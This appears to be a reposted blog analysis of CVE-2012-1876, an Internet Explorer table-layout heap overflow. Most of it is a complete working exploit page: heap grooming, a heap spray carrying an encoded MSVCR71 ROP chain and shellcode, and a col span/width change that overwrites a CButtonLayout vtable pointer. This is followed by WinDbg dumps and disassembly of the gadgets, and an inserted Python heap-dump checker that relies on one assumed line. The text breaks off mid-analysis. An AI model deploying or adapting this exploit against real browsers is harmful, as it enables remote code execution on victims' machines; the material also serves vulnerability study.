[Repost] CVE-2012-1876 EXPLOIT analysis

2014-08-01 13:43:36 | Category: Reference articles

This article is reposted from zenhumany, "CVE-2012-1876 EXPLOIT analysis".

CVE-2012-1876 EXPLOIT

1. Metasploit script

<html>
<body>
<div id="dGRr"></div>

<table style="table-layout:fixed" ><col id="0" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="1" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="2" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="3" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="4" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="5" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="6" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="7" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="8" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="9" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="10" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="11" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="12" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="13" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="14" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="15" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="16" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="17" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="18" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="19" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="20" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="21" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="22" 
width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="23" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="24" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="25" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="26" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="27" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="28" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="29" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="30" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="31" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="32" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="33" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="34" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="35" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="36" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="37" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="38" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="39" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="40" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="41" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="42" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="43" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="44" width="41" span="9" >&nbsp 
</col></table><table style="table-layout:fixed" ><col id="45" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="46" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="47" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="48" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="49" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="50" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="51" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="52" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="53" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="54" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="55" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="56" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="57" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="58" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="59" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="60" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="61" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="62" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="63" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="64" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="65" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="66" width="41" span="9" >&nbsp </col></table><table 
style="table-layout:fixed" ><col id="67" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="68" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="69" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="70" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="71" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="72" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="73" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="74" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="75" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="76" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="77" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="78" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="79" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="80" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="81" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="82" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="83" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="84" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="85" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="86" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="87" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="88" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="89" 
width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="90" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="91" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="92" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="93" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="94" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="95" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="96" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="97" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="98" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="99" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="100" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="101" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="102" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="103" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="104" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="105" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="106" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="107" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="108" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="109" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="110" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="111" width="41" span="9" >&nbsp 
</col></table><table style="table-layout:fixed" ><col id="112" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="113" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="114" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="115" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="116" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="117" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="118" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="119" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="120" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="121" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="122" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="123" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="124" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="125" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="126" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="127" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="128" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="129" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="130" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="131" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="132" width="41" span="9" >&nbsp </col></table>

<script language='javascript'>

// Three 480-character filler strings. Each is later cut to (0x100-6)/2 = 125
// characters, so that with its length header and terminator every string
// occupies exactly one 0x100-byte heap block (see the dump in section 2.1).
var dap = "EEEE";
while ( dap.length < 480 ) dap += dap;

var padding = "AAAA";
while ( padding.length < 480 ) padding += padding;

var filler = "BBBB";
while ( filler.length < 480 ) filler += filler;

var arr = new Array();
var rra = new Array();

var div_container = document.getElementById("dGRr");
div_container.style.cssText = "display:none";

// Allocate E, A and B strings followed by a <button> (a CButtonLayout object)
// 250 times, so the heap fills with the pattern E | A | B | CButtonLayout.
for (var i=0; i < 500; i+=2) {
    rra[i] = dap.substring(0, (0x100-6)/2);
    arr[i] = padding.substring(0, (0x100-6)/2);
    arr[i+1] = filler.substring(0, (0x100-6)/2);
    var obj = document.createElement("button");
    div_container.appendChild(obj);
}

// Free the E strings from index 200 onwards, leaving 0x100-byte holes directly
// in front of A | B | CButtonLayout triples; the column array that
// CTableLayout::CalculateMinMax allocates later lands in one of these holes.
for (var i=200; i<500; i+=2 ) {
    rra[i] = null;
    CollectGarbage();
}

function heap_spray(){
    CollectGarbage();

    // Payload: an MSVCR71 ROP chain followed by the shellcode, %u-encoded as
    // UTF-16 (its first dwords, 7c346c0b 7c36f970 ..., reappear at 0x07070024
    // in section 2.2).
var shellcode = unescape("%u6c0b%u7c34%uf970%u7c36%u8b05%u7c34%uf970%u7c36%uf970%u7c36%u373a%u7c34%u0400%u0000%u44d0%u7c34%u0040%u0000%u1829%u7c36%uf036%u7c38%u2766%u7c34%u6c0b%u7c34%u0564%u7c35%u15a2%u7c34%u66ff%u7c37%ua151%u7c37%u8c81%u7c37%u5c30%u7c34%ub1b5%u92b6%u8790%u73d6%ud01b%u3cfd%u4a15%u918d%ud389%u04f8%u7649%u0c37%u48b7%ud52b%u9893%u43b2%u4247%u1d4b%ube99%u9f1c%ue001%ud423%u77b9%u2f78%u7c40%u7e41%u3d66%u4f9b%u3f46%ua9bf%u0d4e%uf50b%u972c%ue13b%u2527%u2d35%ub0bb%u7079%ub467%ue388%u6973%u97fd%ub125%u7eb0%u7476%u7c78%u4272%ube49%u90b6%ub891%u7543%ufc28%u1198%u1ce0%ue22a%u8066%ub4f8%ueb08%u993f%ua892%u2f04%ua94f%u0234%u85f5%u1dd4%u9340%u7b4a%ub737%u962d%ue181%u0c7f%u357a%ub948%u2446%u418d%ubf67%u300d%u3cf9%u9fba%u4e77%ub53d%u3147%u05d6%u3a15%u7dd5%u2c27%ubb9b%u4bb3%u71b2%u7b14%u1479%ufc32%u7a40%u9b67%u1276%u48fd%u8cb6%u24e1%uba98%ud621%u4291%u8447%ud5f6%u71a9%u6643%ue229%u277e%ub2b3%u2d78%u7072%u334e%uf9d1%u04b8%u4a7c%u0c73%ub51d%u4634%uf883%u759f%ub405%u998d%u0d7f%u0a77%u2fe3%uff09%uc1c6%u6be0%u4bd4%uf503%ubf41%u352c%u9215%u371c%u9796%ubebb%ub7b1%ub93d%u90a8%u7d3f%u493c%u7493%ub025%ueb38%u714f%u727b%u1a73%ubff9%u777d%ue239%u4327%u7975%u2066%uebd2%ub714%u9b2c%ufe86%uc0c7%u18d5%ue3d3%u973d%u49b2%ubb98%ub335%u707a%ub946%uf81b%ub6b4%u1cbe%u3f8d%u4278%u227c%u3cd6%u477f%u4e92%u0367%ub5f5%u8596%u11e0%u4ae1%u4874%u2d91%ua9b1%ub80c%u1576%u7ea8%u0b4b%u90fc%u9904%ufd2b%ub025%u2f40%uba34%u0d1d%u249f%u3705%u1a93%u4fd4%u8d41%u7679%uf869%u9005%u75b0%ueb19%ubf2c%u01b8%u3ce0%u787d%u9746%u93b7%uf687%u72d4%u3f41%ua835%u0a49%u73e1%u254b%u9b4f%u279f%u7bbb%u1c7a%u712d%u7c47%u3d77%u2f7f%ub3b9%u7e70%ua915%u0999%u37e3%u96b2%u23be%ud6d2%u4348%ub64e%u0cb5%u670d%u04b4%u4a40%u6634%u83b1%u74e2%u9242%u131d%ubafd%u9824%ufc80%uf52a%ud528%u147e%u8491%u81f9%u78e2%u7c71%ub035%u910c%ud108%uebc1%u8c34%u74e1%ue031%u734f%uf820%u9f97%u1066%u76d4%ub52d%ua9b3%ua81d%u7293%u257b%u793d%u3f75%u48bf%uf538%u7a9b%u7037%u672f%u7f42%ub847%u4bb6%ue33b%u4027%ube0d%u14b1%u9005%uf912%u2c7d%u77b7%u4a1c%u7f92%u3271
%ud6d0%u3c7b%u437d%u8699%u79d5%ufd18%u988d%u4178%ubbba%u73b4%u9646%u7eb9%u7249%ub204%u3374%ue0f7%u8815%u24e1%u4e75%u307c%u96fc%u2170%u1de3%u4f90%ud66b%ubb2d%u397a%u37e2%ub7be%ua999%u49b5%u0576%u2977%u0ceb%ufc41%u6647%ub94b%u3cbf%u98b2%u89b3%ud4c0%uf93a%u8d1c%u4043%u0d97%u152f%ub44a%u9b24%u3dba%ub8f8%u349f%u924e%u3fb0%u27b6%u4648%u2c35%ufd02%u04b1%u4214%u6725%ua893%ud591%udbf5%ubdcb%u26aa%ude9b%u74d9%uf424%u2b58%ub1c9%u3149%u1968%u6803%u8319%ufce8%ud348%u3667%u1c05%uc798%u9475%uf67d%uc2a7%uabf6%u8077%u405b%uc4fc%ud34f%uc170%u5460%u373e%u654e%uf78f%ua51c%u8b8e%ufa5e%ub570%u0f90%uf271%ue0cd%uab23%u539a%ud8d3%u6fdf%u0ed2%ucf54%u2bac%ua4ab%u3506%u15fc%u7d1d%u1ee4%u5e79%uf215%ua29a%u7f5c%u5068%ua95f%u99a1%u9551%ua46d%u185d%ue06c%uc35a%u1a1b%u7e99%ud91b%ua4e3%ufcae%u2e44%u2508%ue374%uaece%u487a%ue985%u4f9e%u824a%uc49b%u456d%u9e2a%u4149%u4476%ud0f0%u2bd2%u020d%u94ba%u48ab%uc029%u12cd%u2526%uace3%u21b6%ude74%uee84%u482e%u67a5%u8fe8%u5dca%u1f4c%u5e35%u09ac%u0af2%u21fc%u32d3%ub197%ue6dc%ue237%u5972%u52f7%u0933%ub89f%u76bc%uc2bf%u1f16%u3855%u2af1%u5cb9%u430c%u60bb%ucf1f%u8632%uff75%u1012%u66e2%uea3f%u6793%u96ea%uec94%u6618%u055a%u7455%ue50b%u2620%ufa9a%u4d9f%u6f23%uc41b%u0774%u3121%u88b2%u14da%u01c8%ud74e%u6da7%ud79e%u3837%ud7f4%u9c5f%u8bac%ue37a%ub879%u76d6%ue981%ud18b%u17e9%u16f5%ue8b6%ua6d0%u3e8b%u2d1d%u34fd%ued4d");

    // Grow the payload past 100000 characters, then build one string of
    // 16 x 32768 characters (64 KB each); the last copy is 19 characters
    // shorter to leave room for string overhead, so each copy is about 1 MB.
    while (shellcode.length < 100000)
        shellcode = shellcode + shellcode;
    var onemeg = shellcode.substr(0, 64*1024/2);
    for (i=0; i<14; i++) {
        onemeg += shellcode.substr(0, 64*1024/2);
    }
    onemeg += shellcode.substr(0, (64*1024/2)-(38/2));

    // 400 copies of the 1 MB string (about 400 MB) so that address
    // 0x07070024, the value written over the vtable pointer, holds the payload.
    var spray = new Array();
    for (i=0; i<400; i++) {
        spray[i] = onemeg.substr(0, onemeg.length);
    }
}

function smash_vtable(){
    Math.tan(2,3);
    // Setting the last <col> to span=44 with a huge width makes
    // CTableLayout::CalculateMinMax write past its column array into the
    // CButtonLayout allocated right after it (section 2). The width
    // 1178993 times 100 is 117899300 = 0x07070024, the value that ends up
    // in the overwritten vtable pointer (section 2.2).
    var obj_col_0 = document.getElementById("132");
    obj_col_0.width = "1178993";
    obj_col_0.span = "44";
}

setTimeout(function(){heap_spray()}, 400);
setTimeout(function(){smash_vtable()}, 700);

</script>
</body>
</html>


2. Exploitation analysis

2.1 Heap layout following the overflow site

function smash_vtable(){
    Math.tan(2,3);
    var obj_col_0 = document.getElementById("132");
    obj_col_0.width = "1178993";
    obj_col_0.span = "44";
}

After the PoC has executed the smash_vtable statements above, CTableLayout::CalculateMinMax is entered again.

The CTableLayout of the table whose col has id 132 is at address 0x05029158:

0:005> !heap -p -a ebx

address 05029158 found in

_HEAP @ 330000

HEAP_ENTRY Size Prev Flags UserPtr UserSize - state

05029150 002d 0000 [00] 05029158 00158 - (busy)

mshtml!CTableLayout::`vftable'

 

0x050708e0 (the fourth dword of the first line below) is the start address of the column array:

0:005> dc 05029158 + 0x90

050291e8 685fa594 00000024 00000009 050708e0 .._h$...........

050291f8 00000000 00000000 00000000 00000000 ................

05029208 00000000 00000000 00000000 00000000 ................

05029218 000000c8 000000c8 00000000 00000000 ................

05029228 00000000 00000000 00000000 00000000 ................

05029238 00000009 00000000 00000000 00000000 ................

05029248 00000000 00000000 00000000 00000000 ................

05029258 00000000 00000000 ffffffff 00000001 ................

 

 

After the heap spray, the array and the memory following it look like this:

0:005> dc 050708e0 lfc/4 + 100

050708e0 00001004 00001004 00001004 00000000 ................

050708f0 00450045 00450041 00010048 00001004 E.E.A.E.H.......

05070900 00001004 00001004 00000000 00450045 ............E.E.

05070910 00450041 00010048 00001004 00001004 A.E.H...........

05070920 00001004 00000000 00450045 00450041 ........E.E.A.E.

05070930 00010048 00001004 00001004 00001004 H...............

05070940 00000000 00450045 00450041 00010048 ....E.E.A.E.H...

05070950 00001004 00001004 00001004 00000000 ................

05070960 00450045 00450041 00010048 00001004 E.E.A.E.H.......

05070970 00001004 00001004 00000000 00450045 ............E.E.

05070980 00450041 00010048 00001004 00001004 A.E.H...........

05070990 00001004 00000000 00450045 00450041 ........E.E.A.E.

050709a0 00010048 00001004 00001004 00001004 H...............

050709b0 00000000 00450045 00450041 00010048 ....E.E.A.E.H...

050709c0 00001004 00001004 00001004 00000000 ................

050709d0 00450045 00450041 00010048 00000045 E.E.A.E.H...E...

050709e0 2deba1c9 88000000 000000fa 00410041 ...-........A.A.

050709f0 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070a00 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070a10 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070a20 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070a30 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070a40 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070a50 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070a60 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070a70 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070a80 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070a90 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070aa0 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070ab0 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070ac0 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070ad0 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.

05070ae0 00410041 00000041 2deba1a8 88000000 A.A.A......-....

05070af0 000000fa 00420042 00420042 00420042 ....B.B.B.B.B.B.

05070b00 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070b10 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070b20 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070b30 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070b40 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070b50 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070b60 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070b70 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070b80 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070b90 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070ba0 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070bb0 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070bc0 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070bd0 00420042 00420042 00420042 00420042 B.B.B.B.B.B.B.B.

05070be0 00420042 00420042 00420042 00000042 B.B.B.B.B.B.B...

05070bf0 2deba18b 8c000000 687484f8 0380b7d0 ...-......th....

05070c00 0506f7c0 68748690 00000001 00000000 ......th........

05070c10 01080809 ffffffff 00000000 00000000 ................

05070c20 00000000 ffffffff 00000080 ffffffff ................

05070c30 00000000 00000000 00000000 00000000 ................

05070c40 00000000 00000024 00000020 00000000 ....$... .......

05070c50 00000000 00000000 00000000 00000000 ................

05070c60 00000000 00000000 00000000 00000000 ................

05070c70 00000000 00000000 00000000 00000000 ................

05070c80 00000000 00000000 00000000 05070ca8 ................

05070c90 00000000 00000000 00000000 00000000 ................

05070ca0 00000001 00000001 00000000 00000000 ................

05070cb0 00000000 00000000 00000000 00000000 ................

05070cc0 ffffffff ffffffff ffffffff ffffffff ................

0:005> !heap -p -a 050709e0

address 050709e0 found in

_HEAP @ 330000

HEAP_ENTRY Size Prev Flags UserPtr UserSize - state

050709e0 0021 0000 [00] 050709e8 00100 - (busy)

050709e8 is the 0x100-byte string of 'A' characters.

 

0:005> !heap -p -a 05070ae8

address 05070ae8 found in

_HEAP @ 330000

HEAP_ENTRY Size Prev Flags UserPtr UserSize - state

05070ae8 0021 0000 [00] 05070af0 00100 - (busy)

 

0x05070af0 is the 0x100-byte string of 'B' characters.

 

0:005> ln poi(05070bf8)

(687484f8) mshtml!CButtonLayout::`vftable' | (68748690) mshtml!CButtonLayout::`vftable'

Exact matches:

mshtml!CButtonLayout::`vftable' = <no type information>

0:005> !heap -p -a 05070bf8

address 05070bf8 found in

_HEAP @ 330000

HEAP_ENTRY Size Prev Flags UserPtr UserSize - state

05070bf0 0021 0000 [00] 05070bf8 000fc - (busy)

mshtml!CButtonLayout::`vftable'

05070bf8 is the CButtonLayout object, with user size 0xfc.
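To check the layout above mechanically rather than by eye, here is an added Python helper (not part of the original analysis) that parses WinDbg `!heap -p -a` result lines, applies the 8-byte rounding and 8-byte HEAP_ENTRY header of the 32-bit NT heap, and reports whether each block's user data ends exactly where the next header begins. The line for the column array at 050708e0 is assumed, since the page gives only that start address and a 0xfc size, not its `!heap` output.

```python
import re
from dataclasses import dataclass

# Constructed sample: the three `!heap -p -a` result lines shown above, plus
# one ASSUMED line for the CTableLayout column array at 050708e0 (the page
# gives that start address and a 0xfc size, but not this dump line).
HEAP_LINES = """\
050708d8 0021 0000 [00] 050708e0 000fc - (busy)   assumed: column array
050709e0 0021 0000 [00] 050709e8 00100 - (busy)
05070ae8 0021 0000 [00] 05070af0 00100 - (busy)
05070bf0 0021 0000 [00] 05070bf8 000fc - (busy)
"""

GRANULARITY = 8   # 32-bit NT heap: user sizes are rounded up to 8-byte multiples
HEADER_SIZE = 8   # one 8-byte HEAP_ENTRY precedes each user block

# HEAP_ENTRY  Size  Prev  Flags  UserPtr  UserSize  -  state
ENTRY_RE = re.compile(
    r"^([0-9a-f]{8})\s+([0-9a-f]{4})\s+[0-9a-f]{4}\s+\[[0-9a-f]{2}\]\s+"
    r"([0-9a-f]{8})\s+([0-9a-f]{5})\s+-\s+\((\w+)\)",
    re.IGNORECASE,
)


@dataclass
class HeapEntry:
    entry: int        # address of the HEAP_ENTRY header
    size_units: int   # Size column, in 8-byte units, header included
    user_ptr: int
    user_size: int    # bytes requested by the caller
    state: str

    @property
    def rounded_size(self):
        return (self.user_size + GRANULARITY - 1) & ~(GRANULARITY - 1)

    @property
    def user_end(self):
        """First address after the user data, i.e. where the next header sits."""
        return self.user_ptr + self.rounded_size


def parse_heap_entries(text):
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            entries.append(HeapEntry(int(m[1], 16), int(m[2], 16),
                                     int(m[3], 16), int(m[4], 16), m[5]))
    return sorted(entries, key=lambda e: e.entry)


def check_layout(entries):
    """For each block: header/size bookkeeping and whether the next block's
    header starts exactly where this block's (rounded) user data ends."""
    findings = []
    for i, e in enumerate(entries):
        nxt = entries[i + 1] if i + 1 < len(entries) else None
        findings.append({
            "user_ptr": e.user_ptr,
            "user_size": e.user_size,
            "rounded_size": e.rounded_size,
            "header_ok": e.user_ptr - e.entry == HEADER_SIZE,
            "size_ok": e.size_units * GRANULARITY == e.rounded_size + HEADER_SIZE,
            "adjacent_to_next": nxt is not None and e.user_end == nxt.entry,
        })
    return findings


def describe(findings):
    """Render the layout in the form the summary uses: user sizes joined by |."""
    parts = []
    for f, nxt in zip(findings, findings[1:] + [None]):
        parts.append("0x%x" % f["user_size"])
        if nxt is not None and not f["adjacent_to_next"]:
            parts.append("<gap>")
    return " | ".join(parts)


if __name__ == "__main__":
    findings = check_layout(parse_heap_entries(HEAP_LINES))
    for f in findings:
        print("%08x size %03x -> %03x header_ok=%s size_ok=%s adjacent=%s" % (
            f["user_ptr"], f["user_size"], f["rounded_size"],
            f["header_ok"], f["size_ok"], f["adjacent_to_next"]))
    print(describe(findings))
```

A block whose `size_ok` or `header_ok` is false usually means the dump line was copied wrongly or the heap uses a different granularity; a missing `adjacent_to_next` means a block the dump did not show sits in between.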


2.2 Triggering the vulnerability

In CalculateMinMax the bug is triggered, and the resulting overflow overwrites the CButtonLayout's vtable pointer.

Set a hardware write breakpoint (ba w4) at 0x05070bf8:

ba w4 0x05070bf8

Execution breaks after running:

The contents of 0x05070bf8 can be seen to have been overwritten with 07070024.

0x07070024 = 117899300 (decimal), which is the width value 1178993 multiplied by 100.

 

The contents at 07070024 are:

0:005> dc 0x07070024

07070024 7c346c0b 7c36f970 7c348b05 7c36f970 .l4|p.6|..4|p.6|

07070034 7c36f970 7c34373a 00000400 7c3444d0 p.6|:74|.....D4|

07070044 00000040 7c361829 7c38f036 7c342766 @...).6|6.8|f'4|

07070054 7c346c0b 7c350564 7c3415a2 7c3766ff .l4|d.5|..4|.f7|

07070064 7c37a151 7c378c81 7c345c30 d18c67e0 Q.7|..7|0\4|.g..

07070074 4fe2c0fe b5b49b25 347bb08d 7f961c76 ...O%.....{4v...

07070084 054bf53b 72d669a9 46a8b166 eb3870be ;.K..i.rf..F.p8.

07070094 bfd48835 b3ba4e49 9092432c f831932d 5...IN..,C..-.1.

0:005> u 7c346c0b

MSVCR71!_pow_pentium4+0x33f:

7c346c0b c3 ret

7c346c0c 660f13442404 movlpd qword ptr [esp+4],xmm0

7c346c12 dd442404 fld qword ptr [esp+4]

7c346c16 83c410 add esp,10h

7c346c19 c3 ret

7c346c1a 660f124c240c movlpd xmm1,qword ptr [esp+0Ch]

7c346c20 660f121df076387c movlpd xmm3,qword ptr [MSVCR71!ABSVALMASK (7c3876f0)]

7c346c28 660f7ec8 movd eax,xmm1

0:005> u 7c36f970

MSVCR71!_strnicoll+0x77 [f:\vs70builds\3052\vc\crtbld\crt\src\strnicol.c @ 102]:

7c36f970 5d pop ebp

7c36f971 c3 ret

MSVCR71!_strupr [f:\vs70builds\3052\vc\crtbld\crt\src\strupr.c @ 50]:

7c36f972 6a18 push 18h

7c36f974 689823387c push offset MSVCR71!`string'+0x28c (7c382398)

7c36f979 e88d29fdff call MSVCR71!__SEH_prolog (7c34230b)

7c36f97e 33db xor ebx,ebx

7c36f980 895ddc mov dword ptr [ebp-24h],ebx

7c36f983 e8ae9cfdff call MSVCR71!_getptd (7c349636)

0:005> u 7c348b05

